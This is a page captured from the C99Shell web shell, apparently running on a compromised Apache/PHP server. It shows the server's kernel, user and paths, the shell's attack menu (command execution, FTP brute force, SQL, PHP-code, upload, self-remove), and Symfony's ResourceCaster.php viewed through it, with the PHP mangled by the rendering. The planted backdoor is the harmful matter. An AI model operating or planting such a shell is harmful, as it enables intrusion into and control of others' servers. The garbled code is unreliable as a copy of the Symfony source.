!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/queuepro/vendor/symfony/var-dumper/Caster/   drwxrwxr-x
Free 13.1 GB of 57.97 GB (22.6%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ResourceCaster.php (3.13 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\VarDumper\Caster;

use 
Symfony\Component\VarDumper\Cloner\Stub;

/**
 * Casts common resource types to array representation.
 *
 * @author Nicolas Grekas <p@tchwork.com>
 *
 * @final
 */
class ResourceCaster
{
    public static function 
castCurl(\CurlHandle $h, array $aStub $stubbool $isNested): array
    {
        return 
curl_getinfo($h);
    }

    public static function 
castDba($dba, array $aStub $stubbool $isNested)
    {
        
$list dba_list();
        
$a['file'] = $list[(int) $dba];

        return 
$a;
    }

    public static function 
castProcess($process, array $aStub $stubbool $isNested)
    {
        return 
proc_get_status($process);
    }

    public static function 
castStream($stream, array $aStub $stubbool $isNested)
    {
        
$a stream_get_meta_data($stream) + static::castStreamContext($stream$a$stub$isNested);
        if (
$a['uri'] ?? false) {
            
$a['uri'] = new LinkStub($a['uri']);
        }

        return 
$a;
    }

    public static function 
castStreamContext($stream, array $aStub $stubbool $isNested)
    {
        return @
stream_context_get_params($stream) ?: $a;
    }

    public static function 
castGd($gd, array $aStub $stubbool $isNested)
    {
        
$a['size'] = imagesx($gd).'x'.imagesy($gd);
        
$a['trueColor'] = imageistruecolor($gd);

        return 
$a;
    }

    public static function 
castMysqlLink($h, array $aStub $stubbool $isNested)
    {
        
$a['host'] = mysql_get_host_info($h);
        
$a['protocol'] = mysql_get_proto_info($h);
        
$a['server'] = mysql_get_server_info($h);

        return 
$a;
    }

    public static function 
castOpensslX509($h, array $aStub $stubbool $isNested)
    {
        
$stub->cut = -1;
        
$info openssl_x509_parse($hfalse);

        
$pin openssl_pkey_get_public($h);
        
$pin openssl_pkey_get_details($pin)['key'];
        
$pin \array_slice(explode("\n"$pin), 1, -2);
        
$pin base64_decode(implode(''$pin));
        
$pin base64_encode(hash('sha256'$pintrue));

        
$a += [
            
'subject' => new EnumStub(array_intersect_key($info['subject'], ['organizationName' => true'commonName' => true])),
            
'issuer' => new EnumStub(array_intersect_key($info['issuer'], ['organizationName' => true'commonName' => true])),
            
'expiry' => new ConstStub(date(\DateTime::ISO8601$info['validTo_time_t']), $info['validTo_time_t']),
            
'fingerprint' => new EnumStub([
                
'md5' => new ConstStub(wordwrap(strtoupper(openssl_x509_fingerprint($h'md5')), 2':'true)),
                
'sha1' => new ConstStub(wordwrap(strtoupper(openssl_x509_fingerprint($h'sha1')), 2':'true)),
                
'sha256' => new ConstStub(wordwrap(strtoupper(openssl_x509_fingerprint($h'sha256')), 2':'true)),
                
'pin-sha256' => new ConstStub($pin),
            ]),
        ];

        return 
$a;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0055 ]--